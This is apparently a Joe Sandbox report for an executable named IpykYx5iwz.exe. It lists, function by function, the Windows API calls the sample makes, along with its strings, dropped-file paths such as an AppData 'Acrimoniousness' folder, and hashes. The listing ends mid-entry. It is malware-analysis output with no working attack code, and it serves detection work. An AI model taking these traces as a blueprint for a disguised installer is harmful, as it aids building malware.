                                                  • GetDiskFreeSpaceA.KERNEL32(0041FD00,?,?,0000040F,?,0041FD00,0041FD00,?,00000001,0041FD00,?,?,000003FB,?), ref: 004048A4
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004048BF
                                                    • Part of subcall function 00404A18: lstrlenA.KERNEL32(helsidesannoncen: Installing,helsidesannoncen: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404933,000000DF,00000000,00000400,?), ref: 00404AB6
                                                    • Part of subcall function 00404A18: wsprintfA.USER32 ref: 00404ABE
                                                    • Part of subcall function 00404A18: SetDlgItemTextA.USER32(?,helsidesannoncen: Installing), ref: 00404AD1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness$Call$helsidesannoncen: Installing$r%[
                                                  • API String ID: 2624150263-2967769108
                                                  • Opcode ID: feef0b7677b7d06d70c459e9e34dcff38cc359754695d52e5d11696bdf2dcbe7
                                                  • Instruction ID: 834555d72061076239680e6a84f3316086c58123263e9301e374821f8ce8aa56
                                                  • Opcode Fuzzy Hash: feef0b7677b7d06d70c459e9e34dcff38cc359754695d52e5d11696bdf2dcbe7
                                                  • Instruction Fuzzy Hash: 5FA150F1900209ABDB11AFA5CD85AAFB7B8EF84314F10843BF611B62D1D77C99418B6D
                                                  APIs
                                                  • CoCreateInstance.OLE32(00408410,?,00000001,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021BA
                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402269
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness, xrefs: 004021FA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness
                                                  • API String ID: 123533781-3736904667
                                                  • Opcode ID: 17fd2ade8be4bdb53efd74d8c5b9758c57b7155208c8c74f01d8dca469d712fe
                                                  • Instruction ID: 42eae1ebd03e9fd6b26160c2fd50ec5606117bc8341cdde2c537feddc8103cc1
                                                  • Opcode Fuzzy Hash: 17fd2ade8be4bdb53efd74d8c5b9758c57b7155208c8c74f01d8dca469d712fe
                                                  • Instruction Fuzzy Hash: 5A510771A00209AFCB04DFE4C988A9DBBB5FF48314F2085AAF915EB2D1DB799941CB54
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402774
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 16b40471c57f536beacf62a3d2796703244d68fd346794bdeae6274ae2267cc6
                                                  • Instruction ID: 3eaeeeab6897ad977a93c11785c20aea7c68224255535dddcb341d561440b3f0
                                                  • Opcode Fuzzy Hash: 16b40471c57f536beacf62a3d2796703244d68fd346794bdeae6274ae2267cc6
                                                  • Instruction Fuzzy Hash: ACF0E5726441009BD301EBB49A49AFEB76CEF12324F60017BE241F21C1D7B88995D76A
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404BEB
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404BF8
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C47
                                                  • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C5E
                                                  • SetWindowLongA.USER32(?,000000FC,004051DC), ref: 00404C78
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C8A
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C9E
                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404CB4
                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404CC0
                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404CD0
                                                  • DeleteObject.GDI32(00000110), ref: 00404CD5
                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404D00
                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404D0C
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404DA6
                                                  • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404DD6
                                                    • Part of subcall function 00404204: SendMessageA.USER32(00000028,?,00000001,00404034), ref: 00404212
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404DEA
                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404E18
                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404E26
                                                  • ShowWindow.USER32(?,00000005), ref: 00404E36
                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404F31
                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F96
                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404FAB
                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404FCF
                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404FEF
                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 00405004
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405014
                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040508D
                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 00405136
                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00405145
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00405165
                                                  • ShowWindow.USER32(?,00000000), ref: 004051B3
                                                  • GetDlgItem.USER32(?,000003FE), ref: 004051BE
                                                  • ShowWindow.USER32(00000000), ref: 004051C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N$r%[
                                                  • API String ID: 2564846305-730436572
                                                  • Opcode ID: 45c90deb201e3df7399da6381468d2f9a17c1b7f01ece252526a3f8d42b7c933
                                                  • Instruction ID: e03921bd6c6e4a37bdfb411e954e05a497c968e6c467d94503d0be5cca2fcafc
                                                  • Opcode Fuzzy Hash: 45c90deb201e3df7399da6381468d2f9a17c1b7f01ece252526a3f8d42b7c933
                                                  • Instruction Fuzzy Hash: 7E024CB0A00209AFDF209F94DD45AAE7BB5FB84354F10813AF610BA2E1D7799D42DF58
                                                  APIs
                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004043C5
                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 004043D9
                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043F7
                                                  • GetSysColor.USER32(?), ref: 00404408
                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404417
                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404426
                                                  • lstrlenA.KERNEL32(?), ref: 00404429
                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404438
                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040444D
                                                  • GetDlgItem.USER32(?,0000040A), ref: 004044AF
                                                  • SendMessageA.USER32(00000000), ref: 004044B2
                                                  • GetDlgItem.USER32(?,000003E8), ref: 004044DD
                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040451D
                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0040452C
                                                  • SetCursor.USER32(00000000), ref: 00404535
                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 0040454B
                                                  • SetCursor.USER32(00000000), ref: 0040454E
                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040457A
                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040458E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: Call$N$r%[
                                                  • API String ID: 3103080414-31240083
                                                  • Opcode ID: 72a3c28b782e43d93af6a515465b4a3c8a00c1c9b326746d399ca05344fe1376
                                                  • Instruction ID: 25b6b162fa7d48e4e961d9928df0462ddf83e59e31dd5b95d6ec5816e65db8cb
                                                  • Opcode Fuzzy Hash: 72a3c28b782e43d93af6a515465b4a3c8a00c1c9b326746d399ca05344fe1376
                                                  • Instruction Fuzzy Hash: 6E6182B1A00209BBDF109F61DD45B6A7B69FF84710F10813AFB15BA1D1C7B8A951CF98
                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextA.USER32(00000000,00423F20,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: 70a1a6841c1126847f7f0a67fc0902e6e1e74352a81e7501bbba8acc6fe4905f
                                                  • Instruction ID: 2cfb6452d3ed2adb0490a6fda74b90e1dfbf7fcab0fd01839bab840ee2ffb3d6
                                                  • Opcode Fuzzy Hash: 70a1a6841c1126847f7f0a67fc0902e6e1e74352a81e7501bbba8acc6fe4905f
                                                  • Instruction Fuzzy Hash: 07418D71400209AFCB058F95DE459AF7BB9FF45315F00802EF5A1AA1A0C7349955DFA4
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405F41,?,?), ref: 00405DE1
                                                  • GetShortPathNameA.KERNEL32(?,00422AC0,00000400), ref: 00405DEA
                                                    • Part of subcall function 00405C3F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C4F
                                                    • Part of subcall function 00405C3F: lstrlenA.KERNEL32(00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C81
                                                  • GetShortPathNameA.KERNEL32(?,00422EC0,00000400), ref: 00405E07
                                                  • wsprintfA.USER32 ref: 00405E25
                                                  • GetFileSize.KERNEL32(00000000,00000000,00422EC0,C0000000,00000004,00422EC0,?,?,?,?,?), ref: 00405E60
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E6F
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EA7
                                                  • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,004226C0,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00405EFD
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405F0E
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405F15
                                                    • Part of subcall function 00405CDA: GetFileAttributesA.KERNELBASE(00000003,00402E57,C:\Users\user\Desktop\IpykYx5iwz.exe,80000000,00000003), ref: 00405CDE
                                                    • Part of subcall function 00405CDA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D00
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %s=%s$[Rename]
                                                  • API String ID: 2171350718-1727408572
                                                  • Opcode ID: 5501a8743dec453e105ac9914011c0504f14abb99d4cf86462dec57fc9e2f0ce
                                                  • Instruction ID: 443431a376db42b7d779c0f12c1ecf66d6c3f5619bcb6008fb44dfcbbf8babb0
                                                  • Opcode Fuzzy Hash: 5501a8743dec453e105ac9914011c0504f14abb99d4cf86462dec57fc9e2f0ce
                                                  • Instruction Fuzzy Hash: B5312631204B15BBD2207B65AE49F6B3A5CDF81714F14043BF942F62D2DA7CD9028ABD
                                                  APIs
                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\IpykYx5iwz.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403596,?,00000006,00000008,0000000A), ref: 00406403
                                                  • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406410
                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\IpykYx5iwz.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403596,?,00000006,00000008,0000000A), ref: 00406415
                                                  • CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403596,?,00000006,00000008,0000000A), ref: 00406425
                                                  Strings
                                                  • "C:\Users\user\Desktop\IpykYx5iwz.exe", xrefs: 004063E7
                                                  • *?|<>/":, xrefs: 004063F3
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004063AC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\IpykYx5iwz.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-4002828413
                                                  • Opcode ID: 42c4a3e1a2d6554428903665c9d613c7fc86cd3241a92e9ce5ad7ed014b00af2
                                                  • Instruction ID: a9374e22e98c4dc303b182c9b737662c14652e6601d1bee761dd9fa1fda1dddb
                                                  • Opcode Fuzzy Hash: 42c4a3e1a2d6554428903665c9d613c7fc86cd3241a92e9ce5ad7ed014b00af2
                                                  • Instruction Fuzzy Hash: CF1104618047A129EB3206281C44BB77FD84F57760F19507BE9C6722C2C67C5C6687AD
                                                  APIs
                                                  • GetWindowLongA.USER32(?,000000EB), ref: 00404253
                                                  • GetSysColor.USER32(00000000), ref: 00404291
                                                  • SetTextColor.GDI32(?,00000000), ref: 0040429D
                                                  • SetBkMode.GDI32(?,?), ref: 004042A9
                                                  • GetSysColor.USER32(?), ref: 004042BC
                                                  • SetBkColor.GDI32(?,?), ref: 004042CC
                                                  • DeleteObject.GDI32(?), ref: 004042E6
                                                  • CreateBrushIndirect.GDI32(?), ref: 004042F0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                  • Instruction ID: 8c367e47b4306476cf29da68a02135d76106e82033ebf96affcab25eba3a867f
                                                  • Opcode Fuzzy Hash: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                  • Instruction Fuzzy Hash: 362195716007049BCB319F68D948B5BBBF8AF41750B04897EFE96A26E0C734D944CB64
                                                  APIs
                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404B3D
                                                  • GetMessagePos.USER32 ref: 00404B45
                                                  • ScreenToClient.USER32(?,?), ref: 00404B5F
                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B71
                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B97
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                  • Instruction ID: 39453513f114f2a688c797cc76a53a354442de9c6c07e73bdd5afe949bfa8100
                                                  • Opcode Fuzzy Hash: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                  • Instruction Fuzzy Hash: 1A015E75D00218BAEB00DB94DD85FFEBBBCAF55711F10412BBA50F61D0C7B4A9458BA4
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E02
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E35
                                                  • CreateFontIndirectA.GDI32(0040B800), ref: 00401E84
                                                  Strings
                                                  Memory Dump Source
